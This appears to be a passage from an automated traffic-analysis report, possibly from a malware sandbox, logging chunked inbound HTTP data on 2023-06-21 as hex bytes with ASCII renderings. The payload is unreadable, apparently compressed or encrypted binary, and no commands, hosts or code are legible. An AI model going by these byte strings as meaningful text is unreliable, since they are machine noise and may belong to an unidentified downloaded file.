39 f3 81 79 4c c1 62 1f 9f 77 90 6f 70 c5 b9 e9 f7 47 5d 55 bc ff d6 f6 50 e7 96 fc 10 30 e3 f3 ca 21 a7 87 2c 49 01 Data Ascii: 1ff8Cd~+&2F~e2sZ vr^2fAL#i%s/`l%7.%m:{m8=KR4`$/?=/8lH1jHV_FzQ1(Fg\|/Ts~YJwb~B*)_.2d:-;7HUfd>9yLbwopG]UP0!,I
2023-06-21 02:28:15 UTC	689	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:15 UTC	689	IN	Data Raw: 62 88 ae 5a 52 1d 44 8b ea c2 f6 49 d3 3e 9d 1b bf 3b 4b 59 9d 5a 3c e5 0f 2b c2 27 1a df 55 38 68 30 a9 dc a4 91 fe 23 e5 6b 7d 47 a1 2c 72 c0 26 ba 8e 7f b9 45 98 7d 16 86 24 3a c2 08 f2 9f 5f c4 ac 14 e7 64 38 f3 b8 f3 b6 ef 5a 71 b3 83 65 3e e2 d1 5e 51 70 63 19 2e 42 00 02 21 5b 6e 88 d9 43 66 8c 6c 88 95 b8 af 7c 94 65 65 4c 76 11 b0 0c 7e f5 5c 0c a5 de 41 29 91 fa f3 7f 7a 68 70 2c 6c 40 28 8a c3 74 16 aa f1 07 d5 13 2a c0 ca 96 9b 6c 37 ec e5 94 95 3a 0c 3b e6 f3 fb d0 fc 1e b0 a6 ae 76 19 95 fb 8c 13 95 d3 2c 92 76 8a 77 88 83 02 98 93 32 51 38 a2 cb c5 34 2e 23 be 17 7b e2 ee 1a 32 66 89 c5 d7 f3 08 ac dd 35 a1 f5 bc dd 39 93 6a e7 57 e2 3b 15 2d 0d ca ec 13 7a 5a 73 e7 7b 9f 51 f6 5f 8a 88 8d 56 9f e4 6a 27 7e 10 41 40 30 f7 4c b1 18 08 f5 28 Data Ascii: bZRDI>;KYZ<+'U8h0#k}G,r&E}$:_d8Zqe>^Qpc.B![nCfl\|eeLv~\A)zhp,l@(t*l7:;v,vw2Q84.#{2f59jW;-zZs{Q_Vj'~A@0L(
2023-06-21 02:28:15 UTC	697	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	697	IN	Data Raw: 32 30 30 30 0d 0a 19 02 32 c4 9e a9 a6 68 93 93 e9 66 47 22 fa 1e 18 af 13 65 af 9d ef 01 55 97 d0 6e 8d e6 8d f6 dc 97 ed 83 a7 2c 16 1d de fe d7 28 d6 8f 5b 8f b9 3e e6 72 7d c5 59 4d f9 cb dd 40 27 85 27 88 f9 cd 51 b2 ee ec d6 37 2f 1f 5c 19 88 83 31 d8 95 53 1f 22 4f 76 2e 3c a5 7b 19 a3 a0 de 32 8e be b9 d0 e4 7a d7 6f 4c 12 d1 65 86 1d 78 c0 bf 77 45 fb d7 18 69 d9 9e 76 f6 84 b3 70 40 b6 bf ad 6e 12 91 60 18 6e 94 96 6e ea b5 01 f5 b5 1a 0a 6a 38 fb 3c 4c d2 43 ce fc f6 d6 32 b5 1f 92 9c ed af d0 d4 e6 23 9e 99 6c 1f 16 75 7d c1 9f 59 ae 03 f1 58 a7 81 7d c2 c1 7c e5 29 58 1a 5e 84 c1 7e 1d 93 27 cb 88 77 38 3b 18 50 26 7a 4f 79 b9 92 fd 68 6a aa 7e c1 a2 55 28 c6 d8 13 78 32 88 3f 89 fd d6 df a3 ee e8 a2 ab 44 e6 98 54 89 be 56 95 42 f9 aa ad 47 Data Ascii: 20002hfG"eUn,([>r}YM@''Q7/\1S"Ov.<{2zoLexwEivp@n`nnj8<LC2#lu}YX}\|)X^~'w8;P&zOyhj~U(x2?DTVBG
2023-06-21 02:28:15 UTC	705	IN	Data Raw: 88 1b 28 d0 55 32 Data Ascii: (U2
2023-06-21 02:28:15 UTC	705	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:15 UTC	705	IN	Data Raw: 32 30 30 30 0d 0a 27 bd e1 b8 03 c5 09 1b 37 9e f4 b8 0f 18 d8 50 a0 34 ac fc 75 45 a0 6f b9 72 6e be 44 36 68 cf ba 80 c6 34 46 20 cd ea 6f 74 ef d9 3a 43 a1 5d d9 b1 3d c9 76 f8 a0 7e 22 f3 42 40 2a 31 e0 af 5f 32 65 e5 3e 33 72 22 0a fc 56 18 bb 7d 36 9d de 23 e7 01 9d 38 37 7f 83 ab 58 a4 e5 3a 73 8d 75 7f 74 b3 65 87 fb bd b6 30 de 2c 9b 1d 21 da ca 53 ab 7b 72 61 19 fa 5d 66 f3 60 02 d6 99 a4 25 fe e6 04 ed 37 00 44 32 52 4e 7e d6 dc 6b 03 ad 44 37 0a c7 b4 72 34 75 15 71 2e cd b9 03 b4 cf 53 83 bb 2f 65 44 f7 b1 8d 1e 19 d0 3d dd b1 ec 10 69 4a 68 47 7f ee b7 a2 72 7b 34 74 66 54 08 ad f0 bf 21 ce e5 87 fe 02 be 63 a2 fb ce f7 70 bb fa f2 d7 55 4a d0 f3 fe 4e ea 13 62 22 3e a8 24 64 3a 5e ee f9 5a 30 52 5e a6 d0 2d 9e 9f 64 f6 ba 25 85 a3 ac 61 f4 Data Ascii: 2000'7P4uEornD6h4F ot:C]=v~"B@*1_2e>3r"V}6#87X:sute0,!S{ra]f`%7D2RN~kD7r4uq.S/eD=iJhGr{4tfT!cpUJNb">$d:^Z0R^-d%a
2023-06-21 02:28:15 UTC	713	IN	Data Raw: 4d 81 85 56 bb 18 Data Ascii: MV
2023-06-21 02:28:15 UTC	713	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	713	IN	Data Raw: 32 30 30 30 0d 0a 2d e7 27 e0 c5 e3 ac e9 8d 0d 52 32 9b a0 92 db 5c 0f 51 14 67 12 5b 64 ca 84 07 43 27 e4 a4 8f 36 8a 16 d8 02 ff e2 74 2f bf eb 53 d4 b0 35 60 25 31 36 ff 08 de df 29 70 83 e9 db ed f5 f9 28 85 3c 11 34 1f 16 e8 4b 6b a5 af 10 f5 f2 92 e7 c2 c8 88 b8 84 5d 23 0c 3d c4 0b 80 b6 36 c8 f7 d8 69 ca e4 39 02 22 7f ac 98 c8 1e 6e 3b 20 03 71 e0 67 b1 4e 35 0f 91 0d 3b b0 6b 98 65 15 7d 63 f1 c2 03 d3 69 d4 7e b0 e2 07 59 f2 a0 37 94 48 b4 68 d4 67 0e bd e6 32 73 97 88 cb ec e2 ae 4e f1 7b f4 d6 56 11 19 5c aa fb 31 d8 9b 5a af c1 c7 ce 2d 30 f5 5d d5 93 1e ff dc 7b 43 7b d9 70 1a da 11 a9 04 34 7f 29 78 40 14 c7 80 80 fe 4a bd 1c 72 f0 76 12 8e a7 1f 1f 9e 17 b0 e2 3a 87 9f c1 df 04 30 bc da e1 28 3c c3 19 13 c8 b9 f9 86 09 46 26 86 a0 31 c6 Data Ascii: 2000-'R2\Qg[dC'6t/S5`%16)p(<4Kk]#=6i9"n; qgN5;ke}ci~Y7Hhg2sN{V\1Z-0]{C{p4)x@Jrv:0(<F&1
2023-06-21 02:28:16 UTC	721	IN	Data Raw: ac b2 f3 a0 b8 01 Data Ascii:
2023-06-21 02:28:16 UTC	721	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	721	IN	Data Raw: 32 30 30 30 0d 0a 1d 1a e0 c2 63 3e 37 de 0c 15 8a 62 1c 03 9b 1a 19 16 f1 91 57 19 ca db f8 ec 47 30 0b 3b c3 39 22 90 ec e5 49 3a 05 21 21 9c fc 3b ca 24 37 d8 0f 0e 0c 59 65 f3 4e 31 f6 e3 5a 66 d5 fc 8f ff bc 89 a4 c4 87 e7 08 c1 e5 0e 30 55 5c f0 fc 04 c3 4a f5 75 8d e3 0f 3b b1 49 1d e8 cd ef cd f7 88 9c 99 6d 2c 73 f0 d5 96 e1 63 3c 73 0e ff 17 9f 73 51 a8 0f 85 25 64 59 47 a6 ce 50 73 d3 b4 1d 34 d1 0d 40 36 36 5a 9c 59 f8 ff b6 67 90 d8 c4 5c 68 61 18 27 2a e8 0e fa 43 04 67 8b 55 49 d4 9d 33 0a ff 0d de 02 4e 3b b4 e1 83 24 e5 57 0e be ee 69 1c 6e 20 42 98 c5 76 c1 b3 5e 45 76 f9 fb a2 62 90 72 cc 89 ed 8f e8 0f 21 75 5d 24 ed 85 69 7d 74 7c 42 e4 d5 f7 32 af d5 a0 ef 42 d2 b4 02 b1 98 c6 f9 d9 2f ef 94 01 4b 1c b4 c1 6b c4 82 0e 00 6f fe 99 ff Data Ascii: 2000c>7bWG0;9"I:!!;$7YeN1Zf0U\Ju;Im,sc<ssQ%dYGPs4@66ZYg\ha'*CgUI3N;$Win Bv^Evbr!u]$i}t\|B2B/Kko
2023-06-21 02:28:16 UTC	729	IN	Data Raw: 93 8f 58 8c d4 4a Data Ascii: XJ
2023-06-21 02:28:16 UTC	729	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	729	IN	Data Raw: 32 30 30 30 0d 0a 6f 46 f1 4a b0 50 77 e0 6b 0e 2f ba 62 91 9a 59 6f 57 f9 ce 2b 4c 42 31 48 74 9e cb 23 bb ee 01 fc 29 e4 78 71 12 79 12 8a a1 ec 43 2c f7 13 79 95 a2 60 f5 7c 40 a6 5c f8 bd eb 3e 85 4c 4c 18 89 20 b3 58 a9 a3 d5 60 1f fd 18 9c ea 26 fa 8b d0 9d 95 1b 02 13 74 fe 18 d7 97 49 39 00 1a 2e f3 96 fe 65 d6 72 0f 7e 7d ff d3 04 c7 5e fc 99 78 7e 7a bc 43 f7 0d c3 7f fc df 68 e3 b4 5a dc 64 b0 18 11 cf ac 5a 60 32 0e 05 7a 15 de 74 82 04 46 d3 50 0b 77 d2 3b d1 b1 bf 9b 68 96 dd 2a 47 3f e2 e0 74 75 4a 4e ff ac fa 94 e1 3d 9d ea 9f 27 34 f5 94 98 3d 77 78 74 c5 7b 46 75 9b 44 12 3d ca 47 73 52 7a 06 4e f2 c6 7f 9d 2d 8c 41 d9 4f d2 7a 31 67 75 14 ed 91 78 29 f0 1e 62 f3 3f c5 b9 8e 9b b7 50 4c 6d 20 61 2a b1 7f 31 e1 a1 61 ea 5f 12 00 63 10 1b Data Ascii: 2000oFJPwk/bYoW+LB1Ht#)xqyC,y`\|@\>LL X`&tI9.er~}^x~zChZdZ`2ztFPw;hG?tuJN='4=wxt{FuD=GsRzN-AOz1gux)b?PLm a1a_c
2023-06-21 02:28:16 UTC	737	IN	Data Raw: 32 b4 01 35 ea 40 Data Ascii: 25@
2023-06-21 02:28:16 UTC	737	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	737	IN	Data Raw: 32 30 30 30 0d 0a ea f0 88 f9 27 5b 44 94 61 4c e4 81 d0 e1 cb 37 59 db a5 e1 dd da 85 f2 84 27 34 72 cc 67 11 fd 6b 02 1c 4a 1a 58 6e e6 fd fb cb 60 b6 d7 02 ac f1 0d f0 82 05 49 29 96 74 40 86 cf 39 e7 7f cc 76 90 c9 2e 92 6f c3 d9 3b 88 9f b4 bf 8e e7 84 95 95 b5 85 c5 bd 80 b6 6a 8b 1a 2d 26 8d 87 98 aa fa 4e 33 55 14 8b 0e fb 7b 5a be 5f 39 6e c6 b7 58 d6 36 76 6a 09 87 08 a5 cb de ad a0 f5 9f cf e0 74 aa 11 1d ba 77 a0 d0 81 b5 a2 c5 d8 74 68 4c fb b3 60 3c 43 e2 0d b5 e7 47 57 ae d9 b7 aa 83 91 c1 99 ec c8 3d 7d 02 e2 1b 51 9d 2d d3 33 e8 e0 c8 56 ef 5d 97 c4 2f 7d 5b 5c d7 7c c8 37 2a 94 a0 41 44 2d b3 66 e0 30 7e 4e fe 20 b1 a3 61 63 de 56 b4 a5 90 36 1d a4 29 c7 0f a2 56 19 54 91 4f 33 9d d2 55 7d 93 c2 f8 15 67 d0 12 92 f8 22 92 af e3 66 c9 7a Data Ascii: 2000'[DaL7Y'4rgkJXn`I)t@9v.o;j-&N3U{Z_9nX6vjtwthL`<CGW=}Q-3V]/}[\\|7*AD-f0~N acV6)VTO3U}g"fz
2023-06-21 02:28:16 UTC	745	IN	Data Raw: 14 16 cc 2c b4 2f Data Ascii: ,/
2023-06-21 02:28:16 UTC	745	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	745	IN	Data Raw: 31 66 66 38 0d 0a 52 12 87 c6 0d fe 09 3e 7c c9 44 c8 b8 8b 3c 21 ca ab e1 de b1 37 08 7e db df 6f 27 ca 7d 61 51 47 ed 24 72 d7 a4 52 c8 88 73 92 53 a7 74 8b 68 ee 20 29 53 4d f7 85 17 78 f7 a6 64 cc b0 8d 1d fb 8f 8e bf c8 df 18 a2 dc 0d 55 32 2c be 61 f0 98 ef eb e8 c8 4c e9 75 b2 4e cd a5 0f 2b 0b 3b ed 02 38 7a a1 47 4a 18 3e ea 36 92 cc 8a 87 55 41 16 8d 36 6a 4c 78 51 46 f2 6b 0b c1 dd 78 62 7c cd e2 72 59 45 75 cc af 33 c5 e5 eb 6b 9b dd 7e 29 d5 79 a5 b2 5b 38 e1 0a 79 16 f1 a1 d9 db e4 dd 30 93 9f 97 c6 a8 f6 0e 5d 0a a2 93 88 ad 4a fe e8 a6 3a e8 e0 d4 07 af 1d a1 f3 d5 0a ce 50 87 60 a7 d9 0d 79 2d cd a1 7a 7e 08 27 45 b2 d3 65 a8 9e ff e4 09 6e d4 80 fd 67 19 b7 9c eb 8f b6 07 50 d6 02 b0 26 38 93 63 04 35 fc 87 94 90 71 f2 85 d4 6f e3 79 af Data Ascii: 1ff8R>\|D<!7~o'}aQG$rRsSth )SMxdU2,aLuN+;8zGJ>6UA6jLxQFkxb\|rYEu3k~)y[8y0]J:P`y-z~'EengP&8c5qoy
2023-06-21 02:28:16 UTC	753	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:16 UTC	753	IN	Data Raw: 29 06 8c 4d 7b 9e a4 29 e6 56 9d b4 90 3e ff 7d d9 7d c3 a8 6c 42 68 00 6d da dd 22 6f fa be 5c ec 84 c0 0b 29 86 35 14 0e 88 29 6e 70 b3 21 a8 dd f7 86 58 6a b4 3a 48 cf cf a2 04 34 49 89 b3 8b c9 35 90 fe e0 15 b3 41 24 28 dc ae d8 85 00 9f e5 a5 9d 7f 00 08 ce 2e 77 9d 07 9b 83 b7 ae 53 d7 21 ab 1d 02 dd 9f 30 f3 c9 b1 ad ed 41 39 01 8e e5 a8 38 0d 5d bf 73 17 66 b1 85 b0 1c 7c 6d 43 c5 23 f9 d3 4b cb b8 7c 3f 8d 20 e7 36 17 54 0d 77 3d cc f4 8a 37 8c 64 a4 b7 f0 64 69 39 dd 4d f7 e8 f3 71 d7 27 3f 54 94 3c 4e a6 fa 8a 64 16 57 24 a9 e2 d6 42 1d ff 63 f8 da 30 f9 c3 a8 aa d1 55 8e 72 c2 68 b1 f4 0f b9 d4 b1 5c 28 e9 1f 3a 65 f0 8d ab 11 82 8f a9 8e f9 96 5e 41 34 1e 85 1a 02 c1 05 5b 91 43 83 46 6f f7 8f c7 38 ec 43 40 8f b8 25 20 a4 bd 9e 40 cf 70 46 Data Ascii: )M{)V>}}lBhm"o\)5)np!Xj:H4I5A$(.wS!0A98]sf\|mC#K\|? 6Tw=7ddi9Mq'?T<NdW$Bc0Urh\(:e^A4[CFo8C@% @pF
2023-06-21 02:28:16 UTC	761	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	761	IN	Data Raw: 32 30 30 30 0d 0a 4f 10 80 61 f7 42 76 a6 4a af 05 00 47 66 2d 6e 36 df a5 b3 c9 5d 20 0e a0 12 af 34 d9 76 49 14 d2 eb 73 06 4f 93 32 66 e1 8a cf 6d fc d4 dd 0d 31 7d bd 92 c2 ee bc ed 9a 81 6f 81 ec 48 e1 ff c6 a5 fe 88 16 6f 45 f1 89 ca f9 6f 0f 36 9b c6 c1 73 d8 49 88 96 16 2c ec e3 92 34 d1 09 b6 79 2e e4 7f 7b b8 f7 1f 65 d8 6a fc 79 d9 03 51 29 83 90 d7 06 4d 9f ab ae 4f c8 d3 c8 8b 76 ce c2 14 0a 8e 7b 35 80 d2 a9 7e 27 dc f9 de de 68 01 7d fa 0f 44 88 96 86 db 0d de 0d ae ee 53 f3 8f 59 ae d7 88 df c7 d3 80 6c 29 5a eb 8e 62 96 02 e3 68 f8 bf fd c9 ce ee 95 c2 11 80 f8 7e 49 a3 99 b5 fe 2d d3 32 21 d2 a4 da ee 2b 2f 3e 38 c3 2d cf 13 dd e7 b9 99 d1 c6 64 ff 8c b7 92 55 20 84 2a ca 51 8d bd e2 65 5b 43 f0 00 b9 38 12 d4 11 df ce 75 df 46 a4 0c 72 Data Ascii: 2000OaBvJGf-n6] 4vIsO2fm1}oHoEo6sI,4y.{ejyQ)MOv{5~'h}DSYl)Zbh~I-2!+/>8-dU *Qe[C8uFr
2023-06-21 02:28:16 UTC	769	IN	Data Raw: be 2c 4d 8e d0 c2 Data Ascii: ,M
2023-06-21 02:28:16 UTC	769	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	769	IN	Data Raw: 32 30 30 30 0d 0a 28 78 13 19 94 93 ec ff da 13 a4 b4 cc a5 dc ca e6 79 e4 a8 c0 0e f7 86 70 c1 0f 94 88 63 52 20 44 5a 4c 39 6f 8c e0 28 f1 7d f0 fb 0e 3b 1d 75 26 da 68 fb ca 12 7f 90 cd a6 69 73 50 bb 51 db ab 57 a0 3a ad bc 4d a8 d4 e4 35 1f 16 6b d5 91 fc 1a d4 ae 7a 88 83 e6 e8 62 13 14 7a a7 1c 1b ca 8b 6b 08 f3 f4 bd 7c 37 dc 17 ea 3e b4 dc 02 8c c8 c8 36 26 51 b1 f0 1d 51 a3 58 82 88 c8 e3 33 29 5a 3c 12 85 71 ca 28 96 c9 3d 58 62 38 46 f3 e0 3a 11 7f 40 e3 2f 69 66 4b 6c 7d 12 63 1e 3f 4d 47 f3 d3 98 28 44 59 8e 55 50 cb f1 a1 62 a0 1b 0e fc 17 3d 7c 96 6f 77 a5 ef 42 68 71 7a 72 00 57 2c c5 6d ed af d5 8b a3 cc a5 7f 49 e7 6b 6b fc 85 3e ac f9 49 22 7e dc 2b 28 36 58 75 a5 d5 c2 58 22 14 52 3f be 86 67 30 09 08 52 e7 d8 a0 86 b9 b1 9f db 38 19 Data Ascii: 2000(xypcR DZL9o(};u&hisPQW:M5kzbzk\|7>6&QQX3)Z<q(=Xb8F:@/ifKl}c?MG(DYUPb=\|owBhqzrW,mIkk>I"~+(6XuX"R?g0R8
2023-06-21 02:28:16 UTC	777	IN	Data Raw: aa be e1 7d 6e fd Data Ascii: }n
2023-06-21 02:28:16 UTC	777	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	777	IN	Data Raw: 32 30 30 30 0d 0a 9f 82 ee a2 ad fe ec 12 d2 3e 4c 0a 3b 78 af 9c e7 d2 59 e0 a8 f2 82 08 71 2f 39 fa 97 3c 30 c1 e5 1e 0e 2f 73 83 2b 28 ae 74 6b b3 c4 76 d8 cd 89 f4 72 d7 15 42 6c 9e 89 e5 f3 fd c5 94 6d f8 88 d6 aa 32 e7 79 bd aa 1c c5 4e 1d 81 e9 b9 d0 da ed 2e fc f0 57 48 d4 1d 46 99 e0 62 52 93 d6 a9 54 9d 54 8d 42 c8 e9 46 a4 f6 56 6f dc 36 53 2b 8c 89 db b3 18 50 92 88 e6 d6 83 01 f1 95 d1 fd cc 8a 10 f3 b1 25 a7 83 2f ae 4a e0 05 12 bf 6d 0a 5a 28 29 a0 49 63 ac a1 82 92 ff 33 0e f9 bc a4 92 65 96 ce 91 d6 6b da 05 0b 28 8f e6 e7 59 20 66 4c 53 67 13 f0 79 59 0d ee c4 23 3b b9 11 05 25 31 90 e7 2f 00 f1 04 ea 55 65 1d 8b bf 32 54 5a e3 c1 32 6a d7 7b 84 68 44 83 23 b1 cc 24 3f a7 b6 94 17 e5 88 52 ed c1 b8 93 61 fa 40 8f 6c 2b 48 55 c3 04 a4 59 Data Ascii: 2000>L;xYq/9<0/s+(tkvrBlm2yN.WHFbRTTBFVo6S+P%/JmZ()Ic3ek(Y fLSgyY#;%1/Ue2TZ2j{hD#$?Ra@l+HUY
2023-06-21 02:28:16 UTC	785	IN	Data Raw: b7 b2 a9 da b7 56 Data Ascii: V
2023-06-21 02:28:16 UTC	785	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	785	IN	Data Raw: 32 30 30 30 0d 0a 13 f8 ab dc 1a e7 74 d7 24 0f 26 df ea b7 33 1a d0 83 4e 21 74 c2 f3 cd b0 4d 23 19 89 fc 60 a7 ec 06 22 b1 13 8d ee fc 71 20 4c 1f 24 aa dd c4 9f 17 96 93 bb dc f2 fa 80 a3 08 81 e5 39 b5 94 86 ab de b0 82 02 46 d2 cb 88 86 19 4b 89 84 ab a9 72 24 d0 2b b8 02 56 79 1d 4e 2a ed bf e8 37 10 31 93 ce bb 05 da 29 94 43 27 da 7b d1 9f 04 6c e0 b8 ea 93 e3 e6 88 57 f2 85 36 4b 3c d7 9c c5 02 b5 9b c2 c4 08 0c 7f 32 12 2f 4d e7 e6 83 2f 00 14 27 30 be dd 38 3f 9f 0a 28 a2 6a fe 55 9e 2a 96 4a e4 92 7d 4d 17 5c 5b 1c ce 23 82 ff db f6 2d 73 80 05 9e 59 4d 12 34 93 bc c5 e6 7e 3c 21 da 7b f1 e0 3b bc 3c 67 08 d5 46 46 42 19 3e f2 d0 8b a2 e4 43 d5 e8 8f 18 55 70 90 fa a5 5f bb 83 cb 00 29 3e f4 2c a3 aa 6f 24 13 09 ca 70 ac 05 9b d2 e7 f5 3d 36 Data Ascii: 2000t$&3N!tM#`"q L$9FKr$+VyN71)C'{lW6K<2/M/'08?(jUJ}M\[#-sYM4~<!{;<gFFB>CUp_)>,o$p=6
2023-06-21 02:28:16 UTC	793	IN	Data Raw: 38 74 39 2c 81 65 Data Ascii: 8t9,e
2023-06-21 02:28:16 UTC	793	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	793	IN	Data Raw: 32 30 30 30 0d 0a 73 f3 a7 18 7e 17 be 34 2f c9 7a 98 76 1a 8b af fb ab 9f eb f8 89 b5 f4 a0 a6 d0 32 d4 f9 ae fd 3a f8 22 af f6 2f 26 4a 5c db 45 dd 5f 2e c6 94 df da fe 4f 4c 6b a8 95 21 3f 54 94 cf 7c 34 8a f4 dc ca 70 f4 a5 cb 28 4c 88 a4 ce 82 01 88 b5 6f 9d 66 03 a3 f7 25 89 9b 98 b4 c9 1f ae f7 a4 85 55 9a 29 d6 43 36 5d 3b 46 f9 dc 07 6b ee 95 49 a9 58 e9 0b ae 0b 32 48 4f 99 45 35 5e 4d 47 40 4e ac 0c 1a c3 7d 41 5a 03 25 1e bf 23 70 0a ab 61 53 d4 12 27 a9 a9 29 b6 a6 7e f4 3d 5b 6b 37 a0 8d 85 84 f4 43 d3 93 dd 7a 09 e9 ef 6e a0 31 b9 c9 6c 55 04 1d b4 fe fb bc 9f ad e9 57 54 bc bc f5 7e 29 63 0d 34 be a5 7f 6f f1 77 62 44 6e 34 2c d8 63 53 4d a3 24 36 b4 62 14 4f 32 a7 c8 95 99 35 19 d2 1b d3 97 1d 68 e6 fe ef ab 43 b8 6d fb 6b b4 4c 04 62 d2 Data Ascii: 2000s~4/zv2:"/&J\E_.OLk!?T\|4p(Lof%U)C6];FkIX2HOE5^MG@N}AZ%#paS')~=[k7Czn1lUWT~)c4owbDn4,cSM$6bO25hCmkLb
2023-06-21 02:28:16 UTC	801	IN	Data Raw: 07 ca 22 b5 ac 3f Data Ascii: "?
2023-06-21 02:28:16 UTC	801	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	801	IN	Data Raw: 32 30 30 30 0d 0a ea ca e7 45 c3 4f 9b ce a0 21 ed d6 50 6c 4a 40 6e 7f de 4e 5b e3 32 68 f1 7a ed 90 9f 10 cc 31 e6 c9 42 4d e7 6b 6a 4a 2d 66 55 97 ec b9 da bd 2f f5 0c 82 9f b8 24 ce 8e 36 66 c1 ae e7 44 1b fa 3f 26 ea d1 23 54 eb af 9d 2b 22 90 80 f9 c8 9d 42 98 13 14 81 38 1d 6c 26 56 64 5a 86 ca 54 0d 62 5d 7a 3b 03 a6 c9 27 d5 b7 78 05 19 c6 d0 95 ff 56 c6 1f 28 ee d1 14 8c 67 ab bc 97 1d 56 54 3b e8 62 20 6e a0 81 72 1f 82 17 62 30 43 2f c9 33 72 11 d8 8d 8a 62 7e f6 c5 d3 ea 5e 43 10 57 ad c1 ce 0c af e7 e1 d1 4d 2f aa 68 cf b4 74 b9 25 90 a8 79 54 50 9f 33 4c 7c db de 5a 71 d6 03 db 32 da 28 e1 ab 88 b5 32 a2 81 b5 54 c0 f1 ad 57 f7 43 05 64 22 86 9a af 5d 33 14 a7 7e 51 1a 99 5b 11 fe a4 92 09 4c 71 04 98 c6 f2 42 02 99 81 b4 ac 99 b1 7d 03 25 Data Ascii: 2000EO!PlJ@nN[2hz1BMkjJ-fU/$6fD?&#T+"B8l&VdZTb]z;'xV(gVT;b nrb0C/3rb~^CWM/ht%yTP3L\|Zq2(2TWCd"]3~Q[LqB}%
2023-06-21 02:28:16 UTC	809	IN	Data Raw: b5 c2 86 93 7b fe Data Ascii: {
2023-06-21 02:28:16 UTC	809	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	809	IN	Data Raw: 31 66 66 38 0d 0a 7b 7d 60 3f c4 1b 32 98 4b 07 c9 21 b1 7b a5 b4 34 5a 6a 2a 91 ca 43 53 14 3f 7f 23 71 46 a4 a1 71 ae 10 e0 a3 fb 0e b1 2e 77 4d 58 66 4c 21 29 0d 24 2a f9 71 e1 52 fb cb e4 b3 f8 d1 6f e3 c8 1f 70 02 75 a3 34 74 52 f1 8f 72 5c 94 0e 20 94 6b 11 10 44 36 9e 1e c0 23 d9 ea ff b8 2a 33 ca 23 45 a9 3b 04 81 f9 66 cc 74 cc 9a 46 6d e2 fc dc 43 e3 0f f5 d7 09 82 2a 53 2f 0b 5f 2b d2 a9 0a b8 aa 65 65 6f 8c ed bc 2c 77 25 c5 11 45 2a bc 84 ed f4 4b 54 1c ff 7c 2e 41 41 4d 01 ed 40 55 7c 14 82 7c 07 38 1f ad 4c 2e c4 fb d2 d4 2c 8a 13 6b 0b 77 54 43 6b 25 1b 96 fc 9b 9d 71 29 03 63 10 f6 b0 a8 7b 2c 27 a3 52 5a 20 fd 4a 5e d0 7b 82 c8 d1 a7 96 59 ef bf 82 90 76 87 8f e3 9d 5e 4f c9 82 4c 46 65 7a a2 32 de 9e f1 b6 f2 1d c2 5b 1a 1b 6a 42 5a 18 Data Ascii: 1ff8{}`?2K!{4ZjCS?#qFq.wMXfL!)$qRopu4tRr\ kD6#3#E;ftFmCS/_+eeo,w%E*KT\|.AAM@U\|\|8L.,kwTCk%q)c{,'RZ J^{Yv^OLFez2[jBZ
2023-06-21 02:28:16 UTC	817	IN	Data Raw: 32 30 30 30 0d 0a Data Ascii: 2000
2023-06-21 02:28:16 UTC	817	IN	Data Raw: 63 de 64 f4 ed 96 b1 d0 d9 f3 f8 10 09 b6 27 b7 92 f1 17 2d 9c ad 24 2b c8 c3 13 6d 26 32 a4 8a fb b8 82 72 3a 22 ac 0d 36 fb f6 14 9f 9e 4f b3 00 66 c3 5f 43 8e 4f 9d 48 f3 58 6b 25 c6 08 91 26 c5 3a 5a e3 fc 5e fa 4e 7d 68 60 7a ec 59 89 f9 66 93 d4 00 a8 60 9a ed c0 88 70 1e 1b 5c 36 9c de c7 d7 c2 18 4d a5 6a 2d b8 55 b5 3d 98 d8 4f 64 2f f2 cb 9d 6b df 7e 0f 2c 24 17 75 21 9d 26 64 46 d3 3f 24 1f 7e 5d c6 bb f1 85 3e 6f 33 b5 a1 f4 27 a4 9e e4 7f 83 71 a6 9d 17 80 68 09 c6 21 88 e9 09 a2 8f 94 21 b5 bb 96 ff ea c3 b4 d7 ff 75 08 8b ff dc 73 7c 7d af 87 8d 76 e1 dd 16 03 ac 32 16 f9 22 16 c4 62 10 d3 ee bd 7d 3f 1d ae 70 76 69 13 05 e2 52 a2 f0 b0 7a 62 ee 3c 76 50 b4 9f 32 d1 42 e2 cc 98 a4 53 5c 23 2e 6a 10 dc 99 1b 66 1f 8d 58 28 6a e8 90 f5 25 69 Data Ascii: cd'-$+m&2r:"6Of_COHXk%&:Z^N}h`zYf`p\6Mj-U=Od/k~,$u!&dF?$~]>o3'qh!!us\|}v2"b}?pviRzb<vP2BS\#.jfX(j%i
2023-06-21 02:28:16 UTC	825	IN	Data Raw: 0d 0a Data Ascii:
2023-06-21 02:28:16 UTC	825	IN	Data Raw: 32 30 30 30 0d 0a e5 b0 7e 97 b9 0b 71 1d 79 cc 4f f1 c2 07 59 f5 ce 1e 3c 2b f2 ed 95 8b 8d 0c b7 39 aa 3c d8 65 c1 50 b9 35 1a c0 5f 2c 6a 61 0e 08 56 28 23 ba df 73 fc 01 f6 bc 24 3e f5 96 c4 8d 51 a6 10 3e 7c c6 17 56 54 49 b1 d3 1e 26 6c e9 aa 1d a5 03 b7 65 55 8b 9b 6e 01 55 c6 51 1e b8 4c 04 a6 c8 0c 9d 2b b2 ed ef 57 0f bd a3 0c 03 93 c5 b6 02 e8 9e 40 0a f3 6c 49 ec 30 53 1a 17 21 63 6b bc e5 a0 4c 24 09 53 85 d7 f6 ec 97 68 42 a2 14 b2 37 49 d6 0f ba 5d 67 6a 37 5d e2 57 42 22 2b c0 df 26 87 9c 2d a7 24 0f 6f d3 77 2c e1 d1 0e a9 fb fd 36 c2 50 03 a8 e2 